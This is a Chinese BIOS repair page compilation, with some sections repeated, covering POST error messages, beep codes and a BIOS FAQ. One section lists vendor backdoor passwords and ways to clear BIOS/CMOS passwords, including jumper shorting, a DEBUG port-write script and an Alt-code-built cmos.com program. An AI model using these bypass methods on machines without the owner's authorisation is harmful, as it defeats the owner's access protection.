    ◆ HARD DISK INSTALL FAILURE
    翻译：硬盘安装失败。
    解析：遇到这种事，请先检查硬碟的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)

    ◆ Primary master hard disk fail
    翻译：POST 侦测到 Primary master IDE 硬盘有错误。
    解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)

    ◆ Primary slave hard disk fail
    翻译：POST 侦测到 Primary slave IDE 硬盘有错误。
    解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)

    ◆ Secondary master hard fail
    翻译：POST 侦测到 Secondary master IDE 硬盘有错误。
    解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)

    ◆ Secondary slave hard fail
    翻译：POST 侦测到 Secondary slave IDE 硬盘有错误。
    解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)

    ◆ Hard disk(s) disagnosis fail
    翻译：执行硬盘诊断时发生错误
    解析：这种讯息通常代表硬盘本身故障...你可以先把这颗硬盘接到别的电脑上试试看，如果还是一样的问题，那只好送修了。

    ◆ Floppy disk(s) fail
    翻译：无法驱动软驱。
    解析：先检查软软驱线有没有接错或松脱？电源线有没有接好？如果这些都没问题，那可能就是软驱故障了。

    ◆ FLOPPY DISK(S) fail(80)
    翻译：无法驱动软驱。
    解析：先检查软驱线有没有接错或松脱？电源线有没有接好？如果这些都没问题，那可能就是软驱故障了。

    ◆ FLOPPY DISK(S) fail(40)
    翻译：无法驱动软驱。
    解析：先检查软驱线有没有接错或松脱？电源线有没有接好？如果这些都没问题，那可能就是软驱故障了。

    ◆ Keyboard error or no keyboard present
    翻译：此讯息表示无法启动键盘。
    解析：检查看看键盘连接线有没有插好？把它插好即可。

    ◆ Memory test fail
    翻译：内存测试失败。
    解析：通常会发生这种情形大概都是因为内存不兼容或故障所导致，所以请先以每次开机一条内存的　　　方式分批测试，找出故障的内存，把它拿掉或送修即可。

    ◆ Override enable-Defualts loaded
    翻译：目前的 CMOS 组态设定如果无法启动系统，则载入 BIOS 预设值以启动系统。
    解析：可能是你在 BIOS 内的设定并不适合你的电脑 ( 像你的内存只能跑PC100但你让它跑PC133 )，这时进入 BIOS 设定画面把设定以稳定为优先做调整即可。

    ◆ Press TAB to show POST screen
    翻译：按 TAB 可以切换幕萤显示。
    解析：有一些 OEM 厂商会以自己设计的显示画面来取代 BIOS 预设的 POST 显示画面，而此讯息就是要告诉使用者可以按 TAB 来把厂商的自定画面和 BIOS 预设的 POST 画面来做切换。

  BIOS维修网站>>自检响铃代码解密

主页
  打印

    在电脑发生故障时，机器响铃不断。这时，如果你是一位高手，也许可以根据经验判断出故障所在，若根据经验无法判断，或者你对硬件设备一无所知，这时只有去请教专业人员了。笔者由于一台电脑出现故障，开机后只有机器报错的响铃，找不到故障点，只好上网去查询PC机开机自检响铃代码的含义，最终依据代码准确查找出故障所在部位并将其排除。好东西不敢私藏，特向大家推荐，希望你也能据此准确地判断出故障所在，当一回高手。

    本文以较常见的两种BIOS（AMI BIOS和Award BIOS）的电脑为例，介绍开机自检响铃代码的具体含义（关于电脑使用的BIOS型号可从BIOS芯片上或者从开机自检的信息中看到，如看到AMI的字样则为AMI BIOS；如看到Award字样则为Award BIOS）。

AWARD 的BIOS自检响铃及其意义

1短: 系统正常启动。这是我们每天都能听到的，也表明机器没有任何问题。
2短: 常规错误，请进入CMOS Setup，重新设置不正确的选项。
1长1短: RAM或主板出错。换一条内存试试，若还是不行，只好更换主板。
1长2短: 显示器或显示卡错误。
1长3短: 键盘控制器错误。检查主板。
1长9短: 主板Flash RAM或EPROM错误，BIOS损坏。换块Flash RAM试试。
不断地响（长声）: 内存条未插紧或损坏。重插内存条，若还是不行，只有更换一条内存。
不停地响: 电源、显示器未和显示卡连接好。检查一下所有的插头。
重复短响: 电源问题。
无声音无显示: 电源问题。

AMI 的BIOS自检响铃及其意义

1短: 内存刷新失败。更换内存条。
2短: 内存ECC较验错误。在CMOS Setup中将内存关于ECC校验的选项设为Disabled就可以解决，不过最根本的解决办法还是更换一条内存。
3短: 系统基本内存（第1个64kB）检查失败。换内存。
4短: 系统时钟出错。
5短: 中央处理器（CPU）错误。
6短: 键盘控制器错误。
7短: 系统实模式错误，不能切换到保护模式。
8短: 显示内存错误。显示内存有问题，更换显卡试试。
9短: ROM BIOS检验和错误。
1长3短: 内存错误。内存损坏，更换即可。
1长8短: 显示测试错误。显示器数据线没插好或显示卡没插牢。

Phoenix的BIOS自检响铃及其意义

1短　系统启动正常
1短1短1短　系统加电初始化失败
1短1短2短　主板错误
1短1短3短　CMOS或电池失效
1短1短4短　ROM BIOS校验错误
1短2短1短　系统时钟错误
1短2短2短　DMA初始化失败
1短2短3短　DMA页寄存器错误
1短3短1短　RAM刷新错误
1短3短2短　基本内存错误
1短3短3短　基本内存错误
1短4短1短　基本内存地址线错误
1短4短2短　基本内存校验错误
1短4短3短　EISA时序器错误
1短4短4短　EISA NMI口错误
2短1短1短　前64K基本内存错误
3短1短1短　DMA寄存器错误

3短1短2短　主DMA寄存器错误
3短1短3短　主中断处理寄存器错误
3短1短4短　从中断处理寄存器错误
3短2短4短　键盘控制器错误
3短1短3短　主中断处理寄存器错误
3短4短2短　显示错误
3短4短3短　时钟错误
4短2短2短　关机错误
4短2短3短　A20门错误
4短2短4短　保护模式中断错误
4短3短1短　内存错误
4短3短3短　时钟2错误
4短3短4短　时钟错误
4短4短1短　串行口错误
4短4短2短　并行口错误
4短4短3短　数字协处理器错误

◆ BIOS ROM checksum error-System halted
翻译：BIOS 信息在进行总和检查 ( checksum ) 时发现错误，因此无法开机。
解析：会遇到这种问题...通常是「死定了」！通常是因为 BIOS 信息刷新不完
全所造成的.

◆ CMOS battery failed
翻译：CMOS 电池失效。
解析：这表是 CMOS 电池的电力已经不足，请更换电池。

◆ CMOS checksum error-Defaults loaded
翻译：CMOS 执行整和检查时发现错误，因此载入预设的系统设定值。
解析：通常发生这种状况都是因为电池电力不足所造成，因此建议先换电源看看。如果此情形依然存在，那就有可能是 CMOS RAM 有问题，而因为 CMOS RAM 我们个人是无法维修的，所以建议送回原厂处理。

◆ Display switch is set incorrectly
翻译：显示开关配置错误。
解析：较旧型的主机板上有 Jumper 可设定萤幕为单色或彩色，而此讯息表示主机板上的设定和 BIOS 里的设定不一致，所以只要判断主机板和BIOS谁为正确，然后更新错误的设定即可。

◆ Press ESC to skip memory test
翻译：在内存测试中，可按下 ESC 略过。
解析：如果你在 BIOS 内并没有设定快速测试的话，那么开机就会执行电脑零件的测试，如果你不想等待，可按 ESC 略过或到 BIOS 内开启 Quick Power On Self Test一劳永逸

◆ HARD DISK initizlizing 【Please wait a moment...】
翻译：正在对硬盘做起始化 ( Initizlize ) 动作。
解析：这种讯息在较新的硬盘上根本看不到。但在较旧型的硬盘上，其动作因为较慢，所以就会看到这个讯息。

◆ HARD DISK INSTALL FAILURE
翻译：硬盘安装失败。
解析：遇到这种事，请先检查硬碟的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)

◆ Primary master hard disk fail
翻译：POST 侦测到 Primary master IDE 硬盘有错误。
解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)

◆ Primary slave hard disk fail
翻译：POST 侦测到 Primary slave IDE 硬盘有错误。
解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)

◆ Secondary master hard fail
翻译：POST 侦测到 Secondary master IDE 硬盘有错误。
解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)

◆ Secondary slave hard fail
翻译：POST 侦测到 Secondary slave IDE 硬盘有错误。
解析：遇到这种事，请先检查硬盘的电源线、硬盘线是否安装妥当？或者硬盘 Jumper 是否设错？ ( 例如两台都设为 Master 或 Slave。)

◆ Hard disk(s) disagnosis fail
翻译：执行硬盘诊断时发生错误
解析：这种讯息通常代表硬盘本身故障...你可以先把这颗硬盘接到别的电脑上试试看，如果还是一样的问题，那只好送修了。

◆ Floppy disk(s) fail
翻译：无法驱动软驱。
解析：先检查软软驱线有没有接错或松脱？电源线有没有接好？如果这些都没问题，那可能就是软驱故障了。

◆ FLOPPY DISK(S) fail(80)
翻译：无法驱动软驱。
解析：先检查软驱线有没有接错或松脱？电源线有没有接好？如果这些都没问题，那可能就是软驱故障了。

◆ FLOPPY DISK(S) fail(40)
翻译：无法驱动软驱。
解析：先检查软驱线有没有接错或松脱？电源线有没有接好？如果这些都没问题，那可能就是软驱故障了。

◆ Keyboard error or no keyboard present
翻译：此讯息表示无法启动键盘。
解析：检查看看键盘连接线有没有插好？把它插好即可。

◆ Memory test fail
翻译：内存测试失败。
解析：通常会发生这种情形大概都是因为内存不兼容或故障所导致，所以请先以每次开机一条内存的方式分批测试，找出故障的内存，把它拿掉或送修即可。

◆ Override enable-Defualts loaded
翻译：目前的 CMOS 组态设定如果无法启动系统，则载入 BIOS 预设值以启动系统。
解析：可能是你在 BIOS 内的设定并不适合你的电脑 ( 像你的内存只能跑PC100但你让它跑PC133 )，这时进入 BIOS 设定画面把设定以稳定为优先做调整即可。

◆ Press TAB to show POST screen
翻译：按 TAB 可以切换幕萤显示。
解析：有一些 OEM 厂商会以自己设计的显示画面来取代 BIOS 预设的 POST 显示画面，而此讯息就是要告诉使用者可以按 TAB 来把厂商的自定画面和 BIOS 预设的 POST 画面来做切换。


bios万能密码法

《一键清理系统垃圾》

bios万能密码法

    "万能"密码法 有些BIOS可以使用"万能"密码，如果BIOS支持，此法可奏效：

(1) AMI BIOS"万能"密码为：
你可以试一试下面的几个单词：AMI，BIOS，PASSWORD，HEWITT RAND，AMI？SW，AMI_SW，
LKWPETER，A.M.I。
(2) AWARD BIOS"万能"密码：
你可以试一试下面的几个单词：AWARD_SW，j262，HLT，SER，SKY_FOX，BIOSTAR，ALFAROME，
lkwpeter，j256，AWARD?SW，LKWPPETER，Syxz，aLLy，589589，589721，awkard（注意大
小写）。
（按：万用密码，就是BIOS程式上面的Back Door，通常厂商用来方便自己的工程人员
使用，所以万用密码可以无论你设什麽密码，都能进入BIOS重新设定。 各家各时期的万用
密码皆不同，所以有时候此法并不能奏效，当然下面还有很多方法，可以分别试用）
--------------------------------------------------------------------------------
CMOS放电法 打开机箱，找到主板上的电池，将其与主板的连接断开（就是取下电池喽），此
时CMOS将因断电而失去内部储存的一切信息。再将电池接通，合上机箱开机，由于CMOS已是
一片空白，它将不再要求你输入密码，此时进入BIOS设置程序，选择主菜单中的"LOAD BIOS
DEFAULT"（装入BIOS缺省值）或"LOAD SETUP DEFAULT"（装入设置程序缺省值）即可，前
者以最安全的方式启动计算机，后者能使你的计算机发挥出较高的性能。
--------------------------------------------------------------------------------
跳线短接法 如果电池被焊死在主板上（别因为不可能，我就看到过好几个！），也就是说不
能进行上面的操作，那又该怎么办？不要紧，我们还可以使用"跳线短接法"的方法对CMOS放
电（建议一般用户使用此法），具体操作如下：
在电池附近有一个跳线开关（可参考主板说明书），一般情况下，在跳线旁边注有RESET
CMOS、CLEAN CMOS、CMOS CLOSE或CMOS RAM RESET等字样，跳线开关一般为四脚，有的在1、
2两脚上有一个跳接器，此时将其拔下接到2、4脚上即可放电；有的所有脚上都没有跳接器，
此时将2脚于充电电容短接即可放电。
    另外应该注意，几乎所有的主板都有清除CMOS的跳线和相关设置，但应厂商不能而各有
所异，例如有的主板的CMOS清除设备并不是我们长见的跳线，而是很小的焊接锡点，一般都
要用镊子，小心地将其短路，就可成功清除CMOS密码！
    （版主点评：此法关键之处在于找到相应的跳线（如果没有主板说明书，则难度就更大
了），其后操作就没有什么了，根据版主的经验，此法应该为最能奏效的方法了。（就是每
此打开机箱太麻烦了:D)
--------------------------------------------------------------------------------
改变硬件配置法 关闭计算机，打开机箱，将硬盘或软盘数据线从主板上拔下，重启计算机，
BIOS自检时出错，系统会要求重新设置BIOS，此时COMS中的密码已被清除。
--------------------------------------------------------------------------------
手工放电法 对于早期的BIOS如386型计算机，主板上没有COMS放电跳线，那么可以用一根瘰疬
的金属线来回划过COMS芯片（COMS芯片在主板的位置可参考主板说明书），可达到给CMOS芯片
放电的效果，从而清除密码。应注意：此法比较危险，建议一般用户不要用此法，以免造成硬
伤害。

万能"密码\AWARD_SW，j262，HLT，SER，SKY_FOX，BIOSTAR，ALFAROME，lkwpeter，j256，
AWARD?SW，LKWPPETER，Syxz，aLLy，589589，589721，awkard
内容:
如果选择System，那么每次开机启动时都会提示您输入密码，如果密码不对，那么就无法使用
计算机了，此密码的设置目的在于禁止外来者使用计算机；如果选择Setup，那么仅在进入
CMOS设置时才提示您输入密码，此密码设置的目的在于禁止未授权用户设置BIOS。我们可根据
不同的目的进行设置，一般来讲，设置了SYSTME密码，那么安全性更高些，但同时如果忘记密
码，其破解也就更复杂些，而设置了Setup密码则反之。下面就列出常用的CMOS密码破解方法：
DEBUG法 用DEBUG(DOS自带的一个程序)向端口70h和71h发送一个数据，可以清除口令设置，具
体操作如下：
C:\>DEBUG
―O 70 10
―O 71 01
―Q
另外可以把上述操作用DEBUG写成一个程序放在一个文件（如DELCMOS.COM）中，具体操作如下：
C:\>DEBUG
―A 100
XXXX:0100 MOV DX,70
XXXX:0103 MOV AL,10
XXXX:0105 OUT DX,AL
XXXX:0106 MOV DX,71
XXXX:0109 MOV AL,01
XXXX:010B OUT DX,AL
XXXX:010C
―R CX
CX 0000
: 0C
―N DELCMOS.COM
―W
Writing 000C bytes
―Q
以后，运行DELCMOS.COM就能清除口令设置了。
--------------------------------------------------------------------------------
无敌Copy法：
在DOS状态下（也可在Win95的Dos下），键入以下命令：
c:>copy con cmos.com (然后进入编辑状态）
一手按住ALT键，另一只手在小键盘上敲击下列数字串，再同时抬起双手，如此反复：
179，55，136，216，230，112，176，32，230，113，254，195，128，251，64，117，241，195
上面的完成后，再按CTRL+Z，得到一程序。（注：上面的数字一定要全部完成，不能疏漏，否则
编译出来的程序可能出错而导致其他问题。另外可以用type coms.com，显示的内容应为ASCII：）
以后只要运行程序cmos.com，即可解开coms密码。从新启动，按DEL键直接进入，即可从新设置CMOS。


BIOS问答

《一键清理系统垃圾》

BIOS问答

其原因是由于CMOS电池电压不足，而且还说电池电压一般应在3.4V左右，如果低于3V，则应考虑更换电池。因手头没有万用表，没法测量主板电池电压，便抱着试一试的心情到商店买了一块同型号的电池，给主板换上了

Q：什么是BIOS ?

A：BIOS（Basic Input／Output System）即基本输入输出系统，通常是固化在只读存储器（ROM）中，所以又称为ROM－BIOS。它直接对计算机系统中的输入、输出设备进行设备级、硬件级的控制，是连接软件程序和硬件设备之间的枢纽。ROM－BIOS是计算机系统中用来提供最低级、最直接的硬件控制的程序。就PC而言，BIOS 包含了控制键盘、显示屏幕，磁盘驱动器，串行通讯设备和很多其它功能的代码。计算机技术发展到今天，出现了各种各样新技术，许多技术的软件部分是借助于BIOS来管理实现的。如PnP技术（Plug and Play-即插即用技术），就是在BIOS中加上PnP模块实现的。又如热插拔技术，也是由系统BIOS将热插拔信息传送给BIOS中的配置管理程序，并由该程序进行重新配置（如：中断、DMA通道等分配）。事实上热插拔技术也属于PnP技术。

--------------------------------------------------------------------------------

Q：BIOS包含哪些部分？

A：当我们打开PC机的电源后，中央处理器（CPU）便会自动执行一连串的命令，这些命令按其功能可分为以下几种：

POST上电自检：是微机接通电源后，系统进行的一个自我检查的例行程序。这个过程通常称为POST——上电自检（Power On Self Test）。对系统的几乎所有的硬件进行检测。

系统启动自举程序：在完成POST自检后，ROM BIOS将按照系统CMOS设置中的启动顺序搜寻软硬盘驱动器及CDROM、网络服务器等有效的启动驱动器 ，读入操作系统引导记录，然后将系统控制权交给引导记录，由引导记录完成系统的启动。

BIOS中断调用：即BIOS中断服务程序，它是微机系统软、硬件之间的一个可编程接口，用于程序软件功能与微机硬件实现的衍接。

此外，BIOS内还包含系统设置程序和服务程序等。

--------------------------------------------------------------------------------

Q：BIOS在系统启动中的作用

A：当通电开机后，计算机即从BIOS芯片中读取出指令代码进行系统硬件的自检（含BIOS程序完整性检验、RAM可读写性检验、进行CPU、DMA控制器等部件测试）。对PnP设备进行检测和确认，然后依次从各个PnP部件上读出相应部件正常工作所需的系统资源数据等配置信息。BIOS中的PnP模块试图建立不冲突的资源分配表，使得所有的部件都能正常地工作。配置完成之后，系统要将所有的配置数据即ESCD——Extended System Config Data写入BIOS中，这就是为什么我们在开机时看到主机启动进入Windows前出现一系列检测：配置内存、硬盘、光驱、声卡等，而后出现的“UPDATE ESCD..SUCCESSED”等提示信息。所有这些检测完成后，BIOS将系统控制权移交给系统的引导模块，由它完成操作系统的装入。

--------------------------------------------------------------------------------

Q：BIOS在哪里？

A：BIOS尽管也是一组程序，但是它同我们常见的在磁盘上的程序有很大的区别。对个人计算机而言，在软盘、光盘或硬盘上的程序必须先读到存储器中才能运行，但BIOS的运行顺序却在这些程序之前，换句话说，必须先跑完BIOS才能使软盘、光盘或硬盘上的程序正常工作，因此，不能把BIOS放在这些存储介质中，而应该直接放在存储器中，但是这种存储器也不能是常说的RAM（Read And Write Memory，随机存取存储器），因为RAM中的内容在断电后会全部消失，下次再开机时就找不到BIOS了，因此，BIOS必须存放在ROM（Read Only Memory，只读存储器）中。BIOS既是软件，但它与普通的软件完全不同，它是固化在集成电路内部的程序代码，又属于硬件的一部分，所以，有时候人们就称它为Firmware ——“固件”。另外，存放BIOS的ROM占用的地址也是固定的，也就是说该地址不能被其它的程序占用，以免每次开机都要寻找BIOS程序的起始点。正由于BIOS和ROM这种密不可分的关系，人们将它们合称为“BIOS ROM”或“ROM BIOS”。所以，我们通常所说的BIOS芯片实际上指的是储存BIOS的ROM芯片，ROM仅仅只是Firmware的载体。

--------------------------------------------------------------------------------

Q：是不是只有主板才有BIOS

A：除了主板以外，其它设备上如网卡、显卡、MODEM、数字相机、硬盘等也有所谓的BIOS，部分SCSI卡和一些特殊功能的界面卡也有自己的BIOS。象显卡上的BIOS，来完成显卡和主板之间的通讯；硬盘的启动和使用也需要HDD BIOS来完成。在开机过程中，主板BIOS会调用并执行这些外加的BIOS的程序，完成对这些硬件的初始化工作。因此从理论上来讲，每种硬件都可以有自己的BIOS。但是BIOS满天飞的结果，不但会增加成本，更会导致兼容性的问题，因此，一般是把已标准化的装置整合在主板BIOS内，对于那些厂商独有的规格，才以外加BIOS的形式出现。这些外部设备上的BIOS也和主板的BIOS一样，采用FLASH ROM作BIOS ROM芯片，同样也可以方便地升级，以修改其缺陷及增强其兼容性。

  但是如果主板厂商愿意合作，仍然可以把原本外加的BIOS整合到主板BIOS中，比如技嘉的G400显卡，上面就没有BIOS芯片，它的BIOS就是写在主板的BIOS中，

--------------------------------------------------------------------------------

Q：BIOS芯片有哪些封装形式？

A：早期的BIOS芯片大多采用DIP（双列直插）形式的封装，随着半导体封装技术的发展，SOJ、TSOP、PSOP、PLCC等多种封装形式相继出台。目前台式机主板上的BIOS大多是DIP封装，有的为节省空间，采用了PLCC形式的封装。笔记本电脑上的BIOS大多采用SOJ封装。为了方便更换BIOS芯片，现在主板上都安装有插座，使用工具可以取下、更换BIOS芯片。

--------------------------------------------------------------------------------

Q：BIOS芯片主要有哪些生产厂商？

A：生产ROM芯片的厂家很多，主要有Winbond、Intel、ATMEL、SST、MXIC等品牌。由于Winbond（华邦）生产BIOS ROM芯片时间较早，与主板的原始设计相兼容，因而市场占用量较大。Intel公司则在FLASH ROM市场始终占领着领导者的地位，其586时代的I28F001BX芯片、I810（815）主板上的N82802AB芯片，都在BIOS的恢复方面有独特的效果。

--------------------------------------------------------------------------------

Q：计算机启动时出现的提示信息的含义是什么，应如何处理？

A：

1.CMOS battery failed（CMOS 电池失效）。

    原因：说明CMOS 电池的电力已经不足，请更换新的电池。

2.CMOS check sum error－Defaults loaded（CMOS 执行全部检查时发现错误，因此载入预设的系统设定值）。

    原因：通常发生这种状况都是因为电池电力不足所造成，所以不妨先换个电池试试看。如果问题依然存在的话，那就说明 CMOS RAM 可能有问题，最好送回原厂处理。

3.Display switch is set incorrectly（显示开关配置错误）。

    原因：较旧型的主板上有跳线可设定显示器为单色或彩色，而这个错误提示表示主板上的设定和 BIOS 里的设定不一致，重新设定即可。

4.Press ESC to skip memory test（内存检查，可按ESC键跳过）。

    原因：如果在 BIOS 内并没有设定快速加电自检的话，那么开机就会执行内存的测试，如果你不想等待，可按 ESC 键跳过或到 BIOS 内开启 Quick Power On Self Test。

5.HARD DISK initializing【Please wait a moment...】（硬盘正在初始化 请等待片刻）。

    原因：这种问题在较新的硬盘上根本看不到。但在较旧的硬盘上，其启动较慢，所以就会出现这个问题。

6.HARD DISK INSTALL FAILURE （硬盘安装失败）。

    原因：硬盘的电源线、数据线可能未接好或者硬盘跳线不当出错误 ( 例如一根数据线上的两个硬盘都设为 Master 或 Slave。)

7.Secondary slave hard fail （检测从盘失败）。

    原因：1 CMOS 设置不当（例如没有从盘但在CMOS里设有从盘）　2 硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当。

8.Hard disk(s) diagnosis fail (执行硬盘诊断时发生错误)。

    原因：这通常代表硬盘本身的故障。你可以先把硬盘接到另一台电脑上试一下，如果问题一样，那只好送修了。

9.Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)（无法驱动软驱）。

    原因：软驱的排线是否接错或松脱？电源线有没有接好？如果这些都没问题，那买个新的吧。

10.Keyboard error or no keyboard present(键盘错误或者未接键盘)

    原因：键盘连接线是否插好？连接线是否损坏？

11.Memory test fail (内存检测失败)

    原因：通常是因为内存不兼容或故障所导致。

12.Override enable－Defaults loaded ( 当前CMOS设定无法启动系统，载入 BIOS 预设值以启动系统)。

    原因：可能是你在BIOS内的设定并不适合你的电脑( 像你的内存只能跑100MHz但你让它跑133MHz )，这时进入 BIOS 设定重新调整即可。

13.Press TAB to show POST screen (按 TAB 键 可以切换屏幕显示)

    原因：有一些 OEM 厂商会以自己设计的显示画面来取代 BIOS 预设的开机显示画面，而此提示就是要告诉使用者可以按TAB来把厂商的自定义画面和BIOS预设的开机画面进行切换。

14.Resuming from disk，Press TAB to show POST screen（从硬盘恢复开机，按TAB显示开机自检画面）。

    原因：某些主板的BIOS 提供了 Suspend to disk(挂起到硬盘)的功能，当使用者以 Suspend to disk 的方式来关机时，那么在下次开机时就会显示此提示消息。

--------------------------------------------------------------------------------

Q：BIOS和CMOS有什么区别？

A：

CMOS（Complimentary Metal Oxide Semiconductor，原意是指互补金属氧化物半导体——一种应用于大规模集成电路芯片制造的原料）是微机主板上的一块可读写的RAM芯片，用来保存当前系统的硬件配置和用户对某些参数的设定。为了保证系统掉电后信息不会丢失，在主板上专门设置了一块电池给CMOS供电。

由于CMOS与BIOS都跟微机系统设置密切相关，所以才有CMOS设置与BIOS设置的说法，CMOS是系统存放参数的地方，而BIOS中的系统设置程序是完成参数设置的手段。因此，准确的说法是通过BIOS设置程序对CMOS参数进行设置。而我们平常所说的CMOS设置与BIOS设置是其简化说法，也就在一定程度上造成两个概念的混淆。

Q：什么时候要对BIOS进行设置？

A：进行BIOS设置是由操作人员根据微机实际情况而人工完成的一项十分重要的系统初始化工作。在以下情况下，必须进行BIOS或CMOS进行设置：

1、新购微机：

即使带PnP功能的系统也只能识别一部分微机外围设备，而对软硬盘参数、当前日期、时钟等基本资料等必须由操作人员进行设置，因此新购买的微机必须通过进行CMOS参数设置来告诉系统整个微机的基本配置情况。

2．新增设备：

由于系统不一定能认识新增的设备，所以必须通过CMOS设置来告诉它。另外，一旦新增设备与原有设备之间发生了IRQ、DMA冲突，也往往需要通过BIOS设置来进行排除。

3．CMOS数据意外丢失：

在系统后备电池失效、病毒破坏了 CMOS数据程序、意外清除了CMOS参数等情况下，常常会造成CMOS数据意外丢失。此时只能重新进入BIOS设置程序完成新的CMOS参数设置。

4．系统优化：

对于内存读写等待时间、硬盘数据传输模式、内／外 Cache的使用、节能保护、电源管理、开机启动顺序等参数， BIOS中预定的设置对系统而言并不一定就是最优的，此时往往需要经过多次试验才能找到系统优化的最佳组合。

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Q：市场上的BIOS主要有哪些品牌？

A：当年IBM PC刚一推出时，大家都以IBM原厂的BIOS为标准，竞相撰写功能与它最接近、但程序码略不相同的BIOS（因为，若程序码相同便可能侵犯著作权），这也正是决定能否号称“与IBM PC百分之百相兼容”的关键。后来随着大环境的改变，兼容机开始盛行，IBM已不再掌握个人计算机规格的主导权，因此兼容厂家的BIOS也都摆脱它的影子，走出自己的风格来，以下便简介其中较具有代表性的四家厂商。

●Award

  Award公司创立于1983年，总部位于美国加州Mountain View，台湾分公司称为“帷尔科技股份有限公司”。在386、486时期，BIOS市场仍是AMI、Award和Phoenix三雄鼎立，产品占有率互有高低，但是自从Phoenix转战笔记本计算机市场、AMI产品青黄不接时，Award及时推出优良的产品填补此空白，因此争取到许多主板厂的订单，占有率节节攀升。以目前台湾生产的主板而言，绝大多数都是采用Award BIOS，它几乎已经成为 Pentium、Pentium Ⅱ主板的标准规格。4

●AMI

  AMI 为American Megatrend Inc.的缩写，成立于1985年，在早期AMI BIOS以其简洁的画面、易学的操作方式，迅速攻占台式计算机的市场，深受大众喜爱。尤其是许多 DIY玩家在购买主板时，更指定非采用AMI BIOS不可，可见当时其气势之盛实在令人咋舌。然而曾几何时，不知是因为行销策略、产品质量或是开发进度的问题，在Pentium、Pentium Ⅱ主板市场上，AMI BIOS就如同当初迅速窜红一般，也快速地沉寂于市场，以致于大好江山拱手让给了Award，虽然后来仍推出WinBIOS和HIFLEX等一系列评价不错的产品，无奈先机已失，终究是无力回天，难再恢复往日荣景。

●Phoenix

  Phoenix 的总部位于加州圣荷西，从它的BIOS设置画面来看，不难发现其产品风格一直都很固定，没有什么大的改变，或许这正是该公司所坚持的传统吧。在早期的Pentium级台式计算机上还偶尔见到Phoenix BIOS，但自从转入笔记本电脑这个计算机市场后，在台式计算机市场已经难觅它的踪影了。而深耕笔记本电脑领域的结果，的确开拓了另一大市场，现在国内、外许多知名品牌的笔记本电脑都采用Phoenix BIOS，由此可知其产品质量深获许多厂商信赖。

●Microid Research

  在诸多BIOS设计厂商中，Microid Research可算是其中最不同凡响的异类，因为早期它几乎是唯一提供“用满意才买”的公司。您可以先从网站上（http:\\www.mrbios.com）下载合用的BIOS文件，试用一定期限后若是满意才须注册付款，否则停止使用、回复到原BIOS即可，不必付一毛钱，这种破天荒的策略确实造福了许多计算机玩家，也打响了“MR BIOS”的名号。

  可惜，曾几何时，Microid Research公司改变了行销策略，不再提供试用版给个人使用, 而是建议使用者向Unicore Software,Inc.订购正式版本，从此结束了许多爱用者的试用美梦，也因此MR BIOS不再是网路讨论区的热门话题，逐渐被大众所淡忘了。

--------------------------------------------------------------------------------

Q：如何进入BIOS的设置程序？

A：进入BIOS设置程序通常有三种方法：

1、开机启动时按热键

在开机时按下特定的热键可以进入BIOS设置程序，不同类型的机器进入BIOS设置程序的按键不同，有的在屏幕上给出提示，有的不给出提示，几种常见的BIOS设置程序的进入方式如下：

  Award BIOS：按Ctrl＋Alt＋Esc或Del，屏幕有提示；

  AMI BIOS：按Del或Esc，屏幕有提示；

  COMPAQ BIOS：屏幕右上角出现光标时按F10，屏幕无提示；

  AST BIOS：按Ctrl＋Alt＋Esc，屏幕无提示。

2、用系统提供的软件

    现在很多主板都提供了在DOS下进入BIOS设置程序而进行设置的程序，在Windows 95的控制面板和注册表中已经包含了部分BIOS设置项。

3、用一些可读写CMOS的应用软件

    部分应用程序，如QAPLUS提供了对CMOS的读、写、修改功能，通过它们可以对一些基本系统配置进行修改。

--------------------------------------------------------------------------------

Q：COMPAQ的Professional WorkStation工作站，敲F10为什么进不了BIOS的设置程序？

A：COMPAQ机的BIOS设置程序及设置参数的存放位置和普通的计算机不同，它是存放在硬盘的一个特殊的分区中。 COMPAQ的Professional WorkStation随盘有一张SmartStart光盘，其中有对工作站进行初始安装的每一步过程，而第一步就是在硬盘上建立一个新的分区并把CMOS中的数据存放在该分区，在该分区中还有对CMOS进行设置的软件，这一点和其他的品牌机、兼容机十分不同，不是直接就可以进入CMOS的设置。所以，如果工作站没有按照正确的步骤进行安装，没有这一特殊的分区，所以也就对F10键没有反应了。解决方法很简单，就是使用SmartStart光盘启动，并按照提示完成CMOS Setup的安装，但是注意应该把原来硬盘中的有用的数据进行备份，因为CMOS分区的过程会把硬盘中数据完全抹掉。

--------------------------------------------------------------------------------

Q：为什么要升级BIOS

A：BIOS中的程序决定了系统对硬件的支持、协调能力。现在的新硬件层出不穷，BIOS不可能预先具备对如此繁多的硬件的支持，这就依赖于对BIOS芯片内程序的更新。升级BIOS最直接的好处就是不用花钱就能获得许多新功能，比如原来你用的是PⅡ的CPU，升级BIOS后也许就能直接使用PⅢ的CPU，不用换主板了；看着别人能用光驱来启动的计算机，自己的不行，升级BIOS后，成了；另外还能增加PnP即插即用功能、新硬盘的LBA和DMA功能、识别其它新硬件等等，简直就是免费升级电脑！

另外，升级BIOS还可以解决一些特殊的电脑故障，这些故障往往令电脑高手也觉得莫名其妙。2000年的到来对全世界都是一件大事，对电脑更是一个大问题，升级BIOS可以有效地解决电脑的2000年问题。

